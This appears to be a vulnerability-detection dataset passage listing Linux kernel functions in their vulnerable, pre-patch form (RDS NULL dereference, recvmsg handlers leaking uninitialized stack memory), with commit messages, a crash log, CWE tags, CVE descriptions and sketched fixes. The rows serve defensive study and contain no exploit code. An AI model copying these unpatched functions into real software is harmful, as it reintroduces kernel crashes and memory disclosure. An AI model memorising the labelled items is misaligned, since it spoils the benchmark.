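	if (!r->pages)
		return -1;
	/* ... some later step inside setup fails ... */
	free(r->pages);		/* callee cleans up on failure ... */
	r->pages = NULL;	/* ... and must not leave a dangling
				   pointer for the caller to free again */
	return -1;
}

int main(void)			/* models ioctx_alloc()'s error path */
{
	struct ring r = { 0 };
	if (setup_ring(&r) < 0)
		free(r.pages);	/* harmless now: free(NULL) is a no-op */
	return 0;
}
```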
1,347 | linux | c2349758acf1874e4c2b93fe41d072336f1a31d0 | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/c2349758acf1874e4c2b93fe41d072336f1a31d0 | rds: prevent dereference of a NULL device
Binding might result in a NULL device, which is dereferenced
causing this BUG:
[ 1317.260548] BUG: unable to handle kernel NULL pointer dereference at 0000000000000974
[ 1317.261847] IP: [<ffffffff84225f52>] rds_ib_laddr_check+0x82/0x110
[ 1317.263315] PGD 418bcb067 PUD 3ceb21067 PMD 0
[ 1317.263502] Oops: 0000 [#1] PREEMPT SMP DEBUG_PAGEALLOC
[ 1317.264179] Dumping ftrace buffer:
[ 1317.264774] (ftrace buffer empty)
[ 1317.265220] Modules linked in:
[ 1317.265824] CPU: 4 PID: 836 Comm: trinity-child46 Tainted: G W 3.13.0-rc4-next-20131218-sasha-00013-g2cebb9b-dirty #4159
[ 1317.267415] task: ffff8803ddf33000 ti: ffff8803cd31a000 task.ti: ffff8803cd31a000
[ 1317.268399] RIP: 0010:[<ffffffff84225f52>] [<ffffffff84225f52>] rds_ib_laddr_check+0x82/0x110
[ 1317.269670] RSP: 0000:ffff8803cd31bdf8 EFLAGS: 00010246
[ 1317.270230] RAX: 0000000000000000 RBX: ffff88020b0dd388 RCX: 0000000000000000
[ 1317.270230] RDX: ffffffff8439822e RSI: 00000000000c000a RDI: 0000000000000286
[ 1317.270230] RBP: ffff8803cd31be38 R08: 0000000000000000 R09: 0000000000000000
[ 1317.270230] R10: 0000000000000000 R11: 0000000000000001 R12: 0000000000000000
[ 1317.270230] R13: 0000000054086700 R14: 0000000000a25de0 R15: 0000000000000031
[ 1317.270230] FS: 00007ff40251d700(0000) GS:ffff88022e200000(0000) knlGS:0000000000000000
[ 1317.270230] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b
[ 1317.270230] CR2: 0000000000000974 CR3: 00000003cd478000 CR4: 00000000000006e0
[ 1317.270230] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[ 1317.270230] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000090602
[ 1317.270230] Stack:
[ 1317.270230] 0000000054086700 5408670000a25de0 5408670000000002 0000000000000000
[ 1317.270230] ffffffff84223542 00000000ea54c767 0000000000000000 ffffffff86d26160
[ 1317.270230] ffff8803cd31be68 ffffffff84223556 ffff8803cd31beb8 ffff8800c6765280
[ 1317.270230] Call Trace:
[ 1317.270230] [<ffffffff84223542>] ? rds_trans_get_preferred+0x42/0xa0
[ 1317.270230] [<ffffffff84223556>] rds_trans_get_preferred+0x56/0xa0
[ 1317.270230] [<ffffffff8421c9c3>] rds_bind+0x73/0xf0
[ 1317.270230] [<ffffffff83e4ce62>] SYSC_bind+0x92/0xf0
[ 1317.270230] [<ffffffff812493f8>] ? context_tracking_user_exit+0xb8/0x1d0
[ 1317.270230] [<ffffffff8119313d>] ? trace_hardirqs_on+0xd/0x10
[ 1317.270230] [<ffffffff8107a852>] ? syscall_trace_enter+0x32/0x290
[ 1317.270230] [<ffffffff83e4cece>] SyS_bind+0xe/0x10
[ 1317.270230] [<ffffffff843a6ad0>] tracesys+0xdd/0xe2
[ 1317.270230] Code: 00 8b 45 cc 48 8d 75 d0 48 c7 45 d8 00 00 00 00 66 c7 45 d0 02 00 89 45 d4 48 89 df e8 78 49 76 ff 41 89 c4 85 c0 75 0c 48 8b 03 <80> b8 74 09 00 00 01 74 06 41 bc 9d ff ff ff f6 05 2a b6 c2 02
[ 1317.270230] RIP [<ffffffff84225f52>] rds_ib_laddr_check+0x82/0x110
[ 1317.270230] RSP <ffff8803cd31bdf8>
[ 1317.270230] CR2: 0000000000000974
Signed-off-by: Sasha Levin <sasha.levin@oracle.com>
Signed-off-by: David S. Miller <davem@davemloft.net> | 1 | static int rds_ib_laddr_check(__be32 addr)
{
int ret;
struct rdma_cm_id *cm_id;
struct sockaddr_in sin;
/* Create a CMA ID and try to bind it. This catches both
* IB and iWARP capable NICs.
*/
cm_id = rdma_create_id(NULL, NULL, RDMA_PS_TCP, IB_QPT_RC);
if (IS_ERR(cm_id))
return PTR_ERR(cm_id);
memset(&sin, 0, sizeof(sin));
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = addr;
/* rdma_bind_addr will only succeed for IB & iWARP devices */
ret = rdma_bind_addr(cm_id, (struct sockaddr *)&sin);
/* due to this, we will claim to support iWARP devices unless we
check node_type. */
if (ret || cm_id->device->node_type != RDMA_NODE_IB_CA)
ret = -EADDRNOTAVAIL;
rdsdebug("addr %pI4 ret %d node type %d\n",
&addr, ret,
cm_id->device ? cm_id->device->node_type : -1);
rdma_destroy_id(cm_id);
return ret;
}
| 264,896,393,456,312,270,000,000,000,000,000,000,000 | ib.c | 188,272,071,066,765,100,000,000,000,000,000,000,000 | [
"CWE-399"
] | CVE-2013-7339 | The rds_ib_laddr_check function in net/rds/ib.c in the Linux kernel before 3.12.8 allows local users to cause a denial of service (NULL pointer dereference and system crash) or possibly have unspecified other impact via a bind system call for an RDS socket on a system that lacks RDS transports. | https://nvd.nist.gov/vuln/detail/CVE-2013-7339 |
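The shape of the fix, as described (likely close to the upstream one-liner, though sketched here rather than quoted): rdma_bind_addr() can leave cm_id->device NULL when no RDS transport is present, so check it before touching node_type:

```c
/* Sketch of the fix described above. */
if (ret || !cm_id->device ||
    cm_id->device->node_type != RDMA_NODE_IB_CA)
	ret = -EADDRNOTAVAIL;
```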
1,348 | linux | bceaa90240b6019ed73b49965eac7d167610be69 | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/bceaa90240b6019ed73b49965eac7d167610be69 | inet: prevent leakage of uninitialized memory to user in recv syscalls
Only update *addr_len when we actually fill in sockaddr, otherwise we
can return uninitialized memory from the stack to the caller in the
recvfrom, recvmmsg and recvmsg syscalls. Drop the (addr_len == NULL)
checks because we only get called with a valid addr_len pointer either
from sock_common_recvmsg or inet_recvmsg.
If a blocking read waits on a socket which is concurrently shut down we
now return zero and set msg_namelen to 0.
Reported-by: mpb <mpb.mail@gmail.com>
Suggested-by: Eric Dumazet <eric.dumazet@gmail.com>
Signed-off-by: Hannes Frederic Sowa <hannes@stressinduktion.org>
Signed-off-by: David S. Miller <davem@davemloft.net> | 1 | static int dgram_recvmsg(struct kiocb *iocb, struct sock *sk,
struct msghdr *msg, size_t len, int noblock, int flags,
int *addr_len)
{
size_t copied = 0;
int err = -EOPNOTSUPP;
struct sk_buff *skb;
struct sockaddr_ieee802154 *saddr;
saddr = (struct sockaddr_ieee802154 *)msg->msg_name;
skb = skb_recv_datagram(sk, flags, noblock, &err);
if (!skb)
goto out;
copied = skb->len;
if (len < copied) {
msg->msg_flags |= MSG_TRUNC;
copied = len;
}
/* FIXME: skip headers if necessary ?! */
err = skb_copy_datagram_iovec(skb, 0, msg->msg_iov, copied);
if (err)
goto done;
sock_recv_ts_and_drops(msg, sk, skb);
if (saddr) {
saddr->family = AF_IEEE802154;
saddr->addr = mac_cb(skb)->sa;
}
if (addr_len)
*addr_len = sizeof(*saddr);
if (flags & MSG_TRUNC)
copied = skb->len;
done:
skb_free_datagram(sk, skb);
out:
if (err)
return err;
return copied;
}
| 189,468,429,727,011,170,000,000,000,000,000,000,000 | dgram.c | 336,326,295,596,065,970,000,000,000,000,000,000,000 | [
"CWE-200"
] | CVE-2013-7265 | The pn_recvmsg function in net/phonet/datagram.c in the Linux kernel before 3.12.4 updates a certain length value before ensuring that an associated data structure has been initialized, which allows local users to obtain sensitive information from kernel stack memory via a (1) recvfrom, (2) recvmmsg, or (3) recvmsg system call. | https://nvd.nist.gov/vuln/detail/CVE-2013-7265 |
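A sketch of the fixed pattern per the commit message (not a verbatim diff): report an address length only after the sockaddr has actually been filled in, so a datagram without source info cannot make the caller copy uninitialized stack bytes to userspace. The same movement of the *addr_len store applies to the ping, l2tp and phonet handlers in the rows that follow.

```c
/* Sketch following the commit description. */
if (saddr) {
	saddr->family = AF_IEEE802154;
	saddr->addr = mac_cb(skb)->sa;
	*addr_len = sizeof(*saddr);	/* moved inside the fill branch */
}
/* no sockaddr filled -> *addr_len is left alone */
```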
1,349 | linux | bceaa90240b6019ed73b49965eac7d167610be69 | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/bceaa90240b6019ed73b49965eac7d167610be69 | inet: prevent leakage of uninitialized memory to user in recv syscalls
Only update *addr_len when we actually fill in sockaddr, otherwise we
can return uninitialized memory from the stack to the caller in the
recvfrom, recvmmsg and recvmsg syscalls. Drop the (addr_len == NULL)
checks because we only get called with a valid addr_len pointer either
from sock_common_recvmsg or inet_recvmsg.
If a blocking read waits on a socket which is concurrently shut down we
now return zero and set msg_namelen to 0.
Reported-by: mpb <mpb.mail@gmail.com>
Suggested-by: Eric Dumazet <eric.dumazet@gmail.com>
Signed-off-by: Hannes Frederic Sowa <hannes@stressinduktion.org>
Signed-off-by: David S. Miller <davem@davemloft.net> | 1 | int ping_recvmsg(struct kiocb *iocb, struct sock *sk, struct msghdr *msg,
size_t len, int noblock, int flags, int *addr_len)
{
struct inet_sock *isk = inet_sk(sk);
int family = sk->sk_family;
struct sockaddr_in *sin;
struct sockaddr_in6 *sin6;
struct sk_buff *skb;
int copied, err;
pr_debug("ping_recvmsg(sk=%p,sk->num=%u)\n", isk, isk->inet_num);
err = -EOPNOTSUPP;
if (flags & MSG_OOB)
goto out;
if (addr_len) {
if (family == AF_INET)
*addr_len = sizeof(*sin);
else if (family == AF_INET6 && addr_len)
*addr_len = sizeof(*sin6);
}
if (flags & MSG_ERRQUEUE) {
if (family == AF_INET) {
return ip_recv_error(sk, msg, len);
#if IS_ENABLED(CONFIG_IPV6)
} else if (family == AF_INET6) {
return pingv6_ops.ipv6_recv_error(sk, msg, len);
#endif
}
}
skb = skb_recv_datagram(sk, flags, noblock, &err);
if (!skb)
goto out;
copied = skb->len;
if (copied > len) {
msg->msg_flags |= MSG_TRUNC;
copied = len;
}
/* Don't bother checking the checksum */
err = skb_copy_datagram_iovec(skb, 0, msg->msg_iov, copied);
if (err)
goto done;
sock_recv_timestamp(msg, sk, skb);
/* Copy the address and add cmsg data. */
if (family == AF_INET) {
sin = (struct sockaddr_in *) msg->msg_name;
sin->sin_family = AF_INET;
sin->sin_port = 0 /* skb->h.uh->source */;
sin->sin_addr.s_addr = ip_hdr(skb)->saddr;
memset(sin->sin_zero, 0, sizeof(sin->sin_zero));
if (isk->cmsg_flags)
ip_cmsg_recv(msg, skb);
#if IS_ENABLED(CONFIG_IPV6)
} else if (family == AF_INET6) {
struct ipv6_pinfo *np = inet6_sk(sk);
struct ipv6hdr *ip6 = ipv6_hdr(skb);
sin6 = (struct sockaddr_in6 *) msg->msg_name;
sin6->sin6_family = AF_INET6;
sin6->sin6_port = 0;
sin6->sin6_addr = ip6->saddr;
sin6->sin6_flowinfo = 0;
if (np->sndflow)
sin6->sin6_flowinfo = ip6_flowinfo(ip6);
sin6->sin6_scope_id = ipv6_iface_scope_id(&sin6->sin6_addr,
IP6CB(skb)->iif);
if (inet6_sk(sk)->rxopt.all)
pingv6_ops.ip6_datagram_recv_ctl(sk, msg, skb);
#endif
} else {
BUG();
}
err = copied;
done:
skb_free_datagram(sk, skb);
out:
pr_debug("ping_recvmsg -> %d\n", err);
return err;
}
| 121,858,951,950,899,140,000,000,000,000,000,000,000 | ping.c | 314,193,521,440,058,100,000,000,000,000,000,000,000 | [
"CWE-200"
] | CVE-2013-7265 | The pn_recvmsg function in net/phonet/datagram.c in the Linux kernel before 3.12.4 updates a certain length value before ensuring that an associated data structure has been initialized, which allows local users to obtain sensitive information from kernel stack memory via a (1) recvfrom, (2) recvmmsg, or (3) recvmsg system call. | https://nvd.nist.gov/vuln/detail/CVE-2013-7265 |
1,354 | linux | bceaa90240b6019ed73b49965eac7d167610be69 | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/bceaa90240b6019ed73b49965eac7d167610be69 | inet: prevent leakage of uninitialized memory to user in recv syscalls
Only update *addr_len when we actually fill in sockaddr, otherwise we
can return uninitialized memory from the stack to the caller in the
recvfrom, recvmmsg and recvmsg syscalls. Drop the (addr_len == NULL)
checks because we only get called with a valid addr_len pointer either
from sock_common_recvmsg or inet_recvmsg.
If a blocking read waits on a socket which is concurrently shut down we
now return zero and set msg_namelen to 0.
Reported-by: mpb <mpb.mail@gmail.com>
Suggested-by: Eric Dumazet <eric.dumazet@gmail.com>
Signed-off-by: Hannes Frederic Sowa <hannes@stressinduktion.org>
Signed-off-by: David S. Miller <davem@davemloft.net> | 1 | static int l2tp_ip_recvmsg(struct kiocb *iocb, struct sock *sk, struct msghdr *msg,
size_t len, int noblock, int flags, int *addr_len)
{
struct inet_sock *inet = inet_sk(sk);
size_t copied = 0;
int err = -EOPNOTSUPP;
struct sockaddr_in *sin = (struct sockaddr_in *)msg->msg_name;
struct sk_buff *skb;
if (flags & MSG_OOB)
goto out;
if (addr_len)
*addr_len = sizeof(*sin);
skb = skb_recv_datagram(sk, flags, noblock, &err);
if (!skb)
goto out;
copied = skb->len;
if (len < copied) {
msg->msg_flags |= MSG_TRUNC;
copied = len;
}
err = skb_copy_datagram_iovec(skb, 0, msg->msg_iov, copied);
if (err)
goto done;
sock_recv_timestamp(msg, sk, skb);
/* Copy the address. */
if (sin) {
sin->sin_family = AF_INET;
sin->sin_addr.s_addr = ip_hdr(skb)->saddr;
sin->sin_port = 0;
memset(&sin->sin_zero, 0, sizeof(sin->sin_zero));
}
if (inet->cmsg_flags)
ip_cmsg_recv(msg, skb);
if (flags & MSG_TRUNC)
copied = skb->len;
done:
skb_free_datagram(sk, skb);
out:
return err ? err : copied;
}
| 263,984,241,115,726,000,000,000,000,000,000,000,000 | l2tp_ip.c | 55,758,294,290,170,330,000,000,000,000,000,000,000 | [
"CWE-200"
] | CVE-2013-7265 | The pn_recvmsg function in net/phonet/datagram.c in the Linux kernel before 3.12.4 updates a certain length value before ensuring that an associated data structure has been initialized, which allows local users to obtain sensitive information from kernel stack memory via a (1) recvfrom, (2) recvmmsg, or (3) recvmsg system call. | https://nvd.nist.gov/vuln/detail/CVE-2013-7265 |
1,355 | linux | bceaa90240b6019ed73b49965eac7d167610be69 | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/bceaa90240b6019ed73b49965eac7d167610be69 | inet: prevent leakage of uninitialized memory to user in recv syscalls
Only update *addr_len when we actually fill in sockaddr, otherwise we
can return uninitialized memory from the stack to the caller in the
recvfrom, recvmmsg and recvmsg syscalls. Drop the (addr_len == NULL)
checks because we only get called with a valid addr_len pointer either
from sock_common_recvmsg or inet_recvmsg.
If a blocking read waits on a socket which is concurrently shut down we
now return zero and set msg_namelen to 0.
Reported-by: mpb <mpb.mail@gmail.com>
Suggested-by: Eric Dumazet <eric.dumazet@gmail.com>
Signed-off-by: Hannes Frederic Sowa <hannes@stressinduktion.org>
Signed-off-by: David S. Miller <davem@davemloft.net> | 1 | static int pn_recvmsg(struct kiocb *iocb, struct sock *sk,
struct msghdr *msg, size_t len, int noblock,
int flags, int *addr_len)
{
struct sk_buff *skb = NULL;
struct sockaddr_pn sa;
int rval = -EOPNOTSUPP;
int copylen;
if (flags & ~(MSG_PEEK|MSG_TRUNC|MSG_DONTWAIT|MSG_NOSIGNAL|
MSG_CMSG_COMPAT))
goto out_nofree;
if (addr_len)
*addr_len = sizeof(sa);
skb = skb_recv_datagram(sk, flags, noblock, &rval);
if (skb == NULL)
goto out_nofree;
pn_skb_get_src_sockaddr(skb, &sa);
copylen = skb->len;
if (len < copylen) {
msg->msg_flags |= MSG_TRUNC;
copylen = len;
}
rval = skb_copy_datagram_iovec(skb, 0, msg->msg_iov, copylen);
if (rval) {
rval = -EFAULT;
goto out;
}
rval = (flags & MSG_TRUNC) ? skb->len : copylen;
if (msg->msg_name != NULL)
memcpy(msg->msg_name, &sa, sizeof(struct sockaddr_pn));
out:
skb_free_datagram(sk, skb);
out_nofree:
return rval;
}
| 225,152,650,498,232,850,000,000,000,000,000,000,000 | datagram.c | 134,059,696,568,289,560,000,000,000,000,000,000,000 | [
"CWE-200"
] | CVE-2013-7265 | The pn_recvmsg function in net/phonet/datagram.c in the Linux kernel before 3.12.4 updates a certain length value before ensuring that an associated data structure has been initialized, which allows local users to obtain sensitive information from kernel stack memory via a (1) recvfrom, (2) recvmmsg, or (3) recvmsg system call. | https://nvd.nist.gov/vuln/detail/CVE-2013-7265 |
1,357 | linux | f3d3342602f8bcbf37d7c46641cb9bca7618eb1c | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/f3d3342602f8bcbf37d7c46641cb9bca7618eb1c | net: rework recvmsg handler msg_name and msg_namelen logic
This patch now always passes msg->msg_namelen as 0. recvmsg handlers must
set msg_namelen to the proper size <= sizeof(struct sockaddr_storage)
to return msg_name to the user.
This prevents numerous uninitialized memory leaks we had in the
recvmsg handlers and makes it harder for new code to accidentally leak
uninitialized memory.
Optimize for the case recvfrom is called with NULL as address. We don't
need to copy the address at all, so set it to NULL before invoking the
recvmsg handler. We can do so, because all the recvmsg handlers must
cope with the case a plain read() is called on them. read() also sets
msg_name to NULL.
Also document these changes in include/linux/net.h as suggested by David
Miller.
Changes since RFC:
Set msg->msg_name = NULL if user specified a NULL in msg_name but had a
non-null msg_namelen in verify_iovec/verify_compat_iovec. This doesn't
affect sendto as it would bail out earlier while trying to copy-in the
address. It also more naturally reflects the logic by the callers of
verify_iovec.
With this change in place I could remove "
if (!uaddr || msg_sys->msg_namelen == 0)
msg->msg_name = NULL
".
This change does not alter the user visible error logic as we ignore
msg_namelen as long as msg_name is NULL.
Also remove two unnecessary curly brackets in ___sys_recvmsg and change
comments to netdev style.
Cc: David Miller <davem@davemloft.net>
Suggested-by: Eric Dumazet <eric.dumazet@gmail.com>
Signed-off-by: Hannes Frederic Sowa <hannes@stressinduktion.org>
Signed-off-by: David S. Miller <davem@davemloft.net> | 1 | mISDN_sock_recvmsg(struct kiocb *iocb, struct socket *sock,
struct msghdr *msg, size_t len, int flags)
{
struct sk_buff *skb;
struct sock *sk = sock->sk;
struct sockaddr_mISDN *maddr;
int copied, err;
if (*debug & DEBUG_SOCKET)
printk(KERN_DEBUG "%s: len %d, flags %x ch.nr %d, proto %x\n",
__func__, (int)len, flags, _pms(sk)->ch.nr,
sk->sk_protocol);
if (flags & (MSG_OOB))
return -EOPNOTSUPP;
if (sk->sk_state == MISDN_CLOSED)
return 0;
skb = skb_recv_datagram(sk, flags, flags & MSG_DONTWAIT, &err);
if (!skb)
return err;
if (msg->msg_namelen >= sizeof(struct sockaddr_mISDN)) {
msg->msg_namelen = sizeof(struct sockaddr_mISDN);
maddr = (struct sockaddr_mISDN *)msg->msg_name;
maddr->family = AF_ISDN;
maddr->dev = _pms(sk)->dev->id;
if ((sk->sk_protocol == ISDN_P_LAPD_TE) ||
(sk->sk_protocol == ISDN_P_LAPD_NT)) {
maddr->channel = (mISDN_HEAD_ID(skb) >> 16) & 0xff;
maddr->tei = (mISDN_HEAD_ID(skb) >> 8) & 0xff;
maddr->sapi = mISDN_HEAD_ID(skb) & 0xff;
} else {
maddr->channel = _pms(sk)->ch.nr;
maddr->sapi = _pms(sk)->ch.addr & 0xFF;
maddr->tei = (_pms(sk)->ch.addr >> 8) & 0xFF;
}
} else {
if (msg->msg_namelen)
printk(KERN_WARNING "%s: too small namelen %d\n",
__func__, msg->msg_namelen);
msg->msg_namelen = 0;
}
copied = skb->len + MISDN_HEADER_LEN;
if (len < copied) {
if (flags & MSG_PEEK)
atomic_dec(&skb->users);
else
skb_queue_head(&sk->sk_receive_queue, skb);
return -ENOSPC;
}
memcpy(skb_push(skb, MISDN_HEADER_LEN), mISDN_HEAD_P(skb),
MISDN_HEADER_LEN);
err = skb_copy_datagram_iovec(skb, 0, msg->msg_iov, copied);
mISDN_sock_cmsg(sk, msg, skb);
skb_free_datagram(sk, skb);
return err ? : copied;
}
| 25,902,652,839,543,214,000,000,000,000,000,000,000 | socket.c | 259,087,261,855,917,000,000,000,000,000,000,000,000 | [
"CWE-20"
] | CVE-2013-7270 | The packet_recvmsg function in net/packet/af_packet.c in the Linux kernel before 3.12.4 updates a certain length value before ensuring that an associated data structure has been initialized, which allows local users to obtain sensitive information from kernel memory via a (1) recvfrom, (2) recvmmsg, or (3) recvmsg system call. | https://nvd.nist.gov/vuln/detail/CVE-2013-7270 |
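A sketch of the handler-side convention this commit introduces (a hypothetical simplification of the mISDN case above, not a verbatim diff): the socket core now calls recvmsg handlers with msg->msg_namelen preset to 0, and a handler sets it only after completely filling msg->msg_name:

```c
/* Sketch of the new convention, not a verbatim diff. */
if (msg->msg_name) {
	struct sockaddr_mISDN *maddr = msg->msg_name;

	memset(maddr, 0, sizeof(*maddr));   /* no uninitialized padding */
	maddr->family = AF_ISDN;
	/* ... fill dev/channel/sapi/tei as in the function above ... */
	msg->msg_namelen = sizeof(*maddr);  /* valid only once filled */
}
/* else: msg_namelen stays 0; nothing is copied back to userspace */
```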
1,359 | linux | f3d3342602f8bcbf37d7c46641cb9bca7618eb1c | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/f3d3342602f8bcbf37d7c46641cb9bca7618eb1c | net: rework recvmsg handler msg_name and msg_namelen logic
This patch now always passes msg->msg_namelen as 0. recvmsg handlers must
set msg_namelen to the proper size <= sizeof(struct sockaddr_storage)
to return msg_name to the user.
This prevents numerous uninitialized memory leaks we had in the
recvmsg handlers and makes it harder for new code to accidentally leak
uninitialized memory.
Optimize for the case recvfrom is called with NULL as address. We don't
need to copy the address at all, so set it to NULL before invoking the
recvmsg handler. We can do so, because all the recvmsg handlers must
cope with the case a plain read() is called on them. read() also sets
msg_name to NULL.
Also document these changes in include/linux/net.h as suggested by David
Miller.
Changes since RFC:
Set msg->msg_name = NULL if user specified a NULL in msg_name but had a
non-null msg_namelen in verify_iovec/verify_compat_iovec. This doesn't
affect sendto as it would bail out earlier while trying to copy-in the
address. It also more naturally reflects the logic by the callers of
verify_iovec.
With this change in place I could remove "
if (!uaddr || msg_sys->msg_namelen == 0)
msg->msg_name = NULL
".
This change does not alter the user visible error logic as we ignore
msg_namelen as long as msg_name is NULL.
Also remove two unnecessary curly brackets in ___sys_recvmsg and change
comments to netdev style.
Cc: David Miller <davem@davemloft.net>
Suggested-by: Eric Dumazet <eric.dumazet@gmail.com>
Signed-off-by: Hannes Frederic Sowa <hannes@stressinduktion.org>
Signed-off-by: David S. Miller <davem@davemloft.net> | 1 | static int atalk_recvmsg(struct kiocb *iocb, struct socket *sock, struct msghdr *msg,
size_t size, int flags)
{
struct sock *sk = sock->sk;
struct sockaddr_at *sat = (struct sockaddr_at *)msg->msg_name;
struct ddpehdr *ddp;
int copied = 0;
int offset = 0;
int err = 0;
struct sk_buff *skb;
skb = skb_recv_datagram(sk, flags & ~MSG_DONTWAIT,
flags & MSG_DONTWAIT, &err);
lock_sock(sk);
if (!skb)
goto out;
/* FIXME: use skb->cb to be able to use shared skbs */
ddp = ddp_hdr(skb);
copied = ntohs(ddp->deh_len_hops) & 1023;
if (sk->sk_type != SOCK_RAW) {
offset = sizeof(*ddp);
copied -= offset;
}
if (copied > size) {
copied = size;
msg->msg_flags |= MSG_TRUNC;
}
err = skb_copy_datagram_iovec(skb, offset, msg->msg_iov, copied);
if (!err) {
if (sat) {
sat->sat_family = AF_APPLETALK;
sat->sat_port = ddp->deh_sport;
sat->sat_addr.s_node = ddp->deh_snode;
sat->sat_addr.s_net = ddp->deh_snet;
}
msg->msg_namelen = sizeof(*sat);
}
skb_free_datagram(sk, skb); /* Free the datagram. */
out:
release_sock(sk);
return err ? : copied;
}
| 30,146,679,912,109,750,000,000,000,000,000,000,000 | ddp.c | 206,398,089,062,534,550,000,000,000,000,000,000,000 | [
"CWE-20"
] | CVE-2013-7270 | The packet_recvmsg function in net/packet/af_packet.c in the Linux kernel before 3.12.4 updates a certain length value before ensuring that an associated data structure has been initialized, which allows local users to obtain sensitive information from kernel memory via a (1) recvfrom, (2) recvmmsg, or (3) recvmsg system call. | https://nvd.nist.gov/vuln/detail/CVE-2013-7270 |
1,370 | linux | f3d3342602f8bcbf37d7c46641cb9bca7618eb1c | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/f3d3342602f8bcbf37d7c46641cb9bca7618eb1c | net: rework recvmsg handler msg_name and msg_namelen logic
This patch now always passes msg->msg_namelen as 0. recvmsg handlers must
set msg_namelen to the proper size <= sizeof(struct sockaddr_storage)
to return msg_name to the user.
This prevents numerous uninitialized memory leaks we had in the
recvmsg handlers and makes it harder for new code to accidentally leak
uninitialized memory.
Optimize for the case recvfrom is called with NULL as address. We don't
need to copy the address at all, so set it to NULL before invoking the
recvmsg handler. We can do so, because all the recvmsg handlers must
cope with the case a plain read() is called on them. read() also sets
msg_name to NULL.
Also document these changes in include/linux/net.h as suggested by David
Miller.
Changes since RFC:
Set msg->msg_name = NULL if user specified a NULL in msg_name but had a
non-null msg_namelen in verify_iovec/verify_compat_iovec. This doesn't
affect sendto as it would bail out earlier while trying to copy-in the
address. It also more naturally reflects the logic by the callers of
verify_iovec.
With this change in place I could remove "
if (!uaddr || msg_sys->msg_namelen == 0)
msg->msg_name = NULL
".
This change does not alter the user visible error logic as we ignore
msg_namelen as long as msg_name is NULL.
Also remove two unnecessary curly brackets in ___sys_recvmsg and change
comments to netdev style.
Cc: David Miller <davem@davemloft.net>
Suggested-by: Eric Dumazet <eric.dumazet@gmail.com>
Signed-off-by: Hannes Frederic Sowa <hannes@stressinduktion.org>
Signed-off-by: David S. Miller <davem@davemloft.net> | 1 | static int ipx_recvmsg(struct kiocb *iocb, struct socket *sock,
struct msghdr *msg, size_t size, int flags)
{
struct sock *sk = sock->sk;
struct ipx_sock *ipxs = ipx_sk(sk);
struct sockaddr_ipx *sipx = (struct sockaddr_ipx *)msg->msg_name;
struct ipxhdr *ipx = NULL;
struct sk_buff *skb;
int copied, rc;
lock_sock(sk);
/* put the autobinding in */
if (!ipxs->port) {
struct sockaddr_ipx uaddr;
uaddr.sipx_port = 0;
uaddr.sipx_network = 0;
#ifdef CONFIG_IPX_INTERN
rc = -ENETDOWN;
if (!ipxs->intrfc)
goto out; /* Someone zonked the iface */
memcpy(uaddr.sipx_node, ipxs->intrfc->if_node, IPX_NODE_LEN);
#endif /* CONFIG_IPX_INTERN */
rc = __ipx_bind(sock, (struct sockaddr *)&uaddr,
sizeof(struct sockaddr_ipx));
if (rc)
goto out;
}
rc = -ENOTCONN;
if (sock_flag(sk, SOCK_ZAPPED))
goto out;
skb = skb_recv_datagram(sk, flags & ~MSG_DONTWAIT,
flags & MSG_DONTWAIT, &rc);
if (!skb)
goto out;
ipx = ipx_hdr(skb);
copied = ntohs(ipx->ipx_pktsize) - sizeof(struct ipxhdr);
if (copied > size) {
copied = size;
msg->msg_flags |= MSG_TRUNC;
}
rc = skb_copy_datagram_iovec(skb, sizeof(struct ipxhdr), msg->msg_iov,
copied);
if (rc)
goto out_free;
if (skb->tstamp.tv64)
sk->sk_stamp = skb->tstamp;
msg->msg_namelen = sizeof(*sipx);
if (sipx) {
sipx->sipx_family = AF_IPX;
sipx->sipx_port = ipx->ipx_source.sock;
memcpy(sipx->sipx_node, ipx->ipx_source.node, IPX_NODE_LEN);
sipx->sipx_network = IPX_SKB_CB(skb)->ipx_source_net;
sipx->sipx_type = ipx->ipx_type;
sipx->sipx_zero = 0;
}
rc = copied;
out_free:
skb_free_datagram(sk, skb);
out:
release_sock(sk);
return rc;
}
| 112,645,242,093,379,780,000,000,000,000,000,000,000 | af_ipx.c | 127,064,475,985,704,280,000,000,000,000,000,000,000 | [
"CWE-20"
] | CVE-2013-7270 | The packet_recvmsg function in net/packet/af_packet.c in the Linux kernel before 3.12.4 updates a certain length value before ensuring that an associated data structure has been initialized, which allows local users to obtain sensitive information from kernel memory via a (1) recvfrom, (2) recvmmsg, or (3) recvmsg system call. | https://nvd.nist.gov/vuln/detail/CVE-2013-7270 |
1,378 | linux | f3d3342602f8bcbf37d7c46641cb9bca7618eb1c | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/f3d3342602f8bcbf37d7c46641cb9bca7618eb1c | net: rework recvmsg handler msg_name and msg_namelen logic
This patch now always passes msg->msg_namelen as 0. recvmsg handlers must
set msg_namelen to the proper size <= sizeof(struct sockaddr_storage)
to return msg_name to the user.
This prevents numerous uninitialized memory leaks we had in the
recvmsg handlers and makes it harder for new code to accidentally leak
uninitialized memory.
Optimize for the case recvfrom is called with NULL as address. We don't
need to copy the address at all, so set it to NULL before invoking the
recvmsg handler. We can do so, because all the recvmsg handlers must
cope with the case a plain read() is called on them. read() also sets
msg_name to NULL.
Also document these changes in include/linux/net.h as suggested by David
Miller.
Changes since RFC:
Set msg->msg_name = NULL if user specified a NULL in msg_name but had a
non-null msg_namelen in verify_iovec/verify_compat_iovec. This doesn't
affect sendto as it would bail out earlier while trying to copy-in the
address. It also more naturally reflects the logic by the callers of
verify_iovec.
With this change in place I could remove "
if (!uaddr || msg_sys->msg_namelen == 0)
msg->msg_name = NULL
".
This change does not alter the user visible error logic as we ignore
msg_namelen as long as msg_name is NULL.
Also remove two unnecessary curly brackets in ___sys_recvmsg and change
comments to netdev style.
Cc: David Miller <davem@davemloft.net>
Suggested-by: Eric Dumazet <eric.dumazet@gmail.com>
Signed-off-by: Hannes Frederic Sowa <hannes@stressinduktion.org>
